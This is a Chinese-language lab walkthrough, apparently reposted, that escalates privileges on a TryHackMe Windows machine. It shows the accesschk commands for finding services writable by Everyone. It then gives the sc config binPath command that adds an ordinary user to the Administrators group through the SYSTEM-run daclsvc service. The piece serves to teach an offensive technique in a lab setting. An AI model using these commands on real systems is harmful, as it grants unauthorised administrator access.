windows读取执行权限(如何使用binPath在)

使用 binPath 提升 Windows 权限

binPath 是一个必需的服务参数,用于指定服务二进制文件的路径。如果任何服务配置了不正确的权限并提供对服务配置的未经授权的访问,攻击者可以利用此错误配置并通过binPath参数执行任意命令。

如果服务配置为以提升的权限运行,攻击者可以在以普通用户身份登录时以管理权限执行任意命令。

攻击背后的想法是识别以系统或管理权限运行的服务,并使用错误的权限来配置服务并通过binPath参数执行任意命令。

Windows 特权升降架

在演示中,我将使用 TryHackMe 中的一个易受攻击的机器,名为Windows PrivEsc Arena。

·黑客机器IP - 10.10.249.6

·受害者机器的IP地址是10.10.140.212

·具有权限的用户 -用户

初始访问

因此,我们可以使用普通用户user的权限进行访问。我们需要通过将用户用户添加到管理员组来提升权限。

windows读取执行权限(如何使用binPath在)(1)

具有用户权限的受害计算机

我们看到只有TCM用户是 Administrators 组的成员。

windows读取执行权限(如何使用binPath在)(2)

管理员组服务

第一步是为服务定义弱权限。我们可以使用Accesschk工具来查找可以修改的服务

accesschk64.exe –wvcu Everyone *

(Shows all the services that has write access to Everyone)

-u = Suppress Errors-w = Show only objects that has write access

-v = Verbose

-c = Name as a windows service ( * for all the services)

windows读取执行权限(如何使用binPath在)(3)

Accesschk 的智能

daclsvc服务将SERVICE_CHANGE_CONFIG权限设置为每个人。

我们可以使用以下命令查询服务以获取更多信息:

accesschk64.exe –wvcu daclsvc

windows读取执行权限(如何使用binPath在)(4)

daclsvc 服务

sc qc daclsvc

windows读取执行权限(如何使用binPath在)(5)

daclsvc 服务

在上面的屏幕截图中,您可以看到daclsvc服务正在以系统权限运行。让我们尝试使用错误的配置将用户用户添加到管理员组。

开发

使用以下命令更改daclsvc服务的 binPath参数:

sc config daclsvc binPath=“net localgroup administrators user /add”

windows读取执行权限(如何使用binPath在)(6)

更改 binPath 参数

我们看到命令执行成功。让我们检查binPath参数:

sc qc daclsvc

windows读取执行权限(如何使用binPath在)(7)

daclsvc 查询服务

重新启动服务后,用户user将被添加到管理员组中。

windows读取执行权限(如何使用binPath在)(8)

服务开始

结论

我向您展示了如何使用 binPath 参数在 Windows 上提升权限。为了防止攻击,您必须防止未经授权的管理员对服务进行更改。

,

免责声明:本文仅代表文章作者的个人观点,与本站无关。其原创性、真实性以及文中陈述文字和内容未经本站证实,对本文以及其中全部或者部分内容文字的真实性、完整性和原创性本站不作任何保证或承诺,请读者仅作参考,并自行核实相关内容。文章投诉邮箱:anhduc.ph@yahoo.com

    分享
    投诉
    首页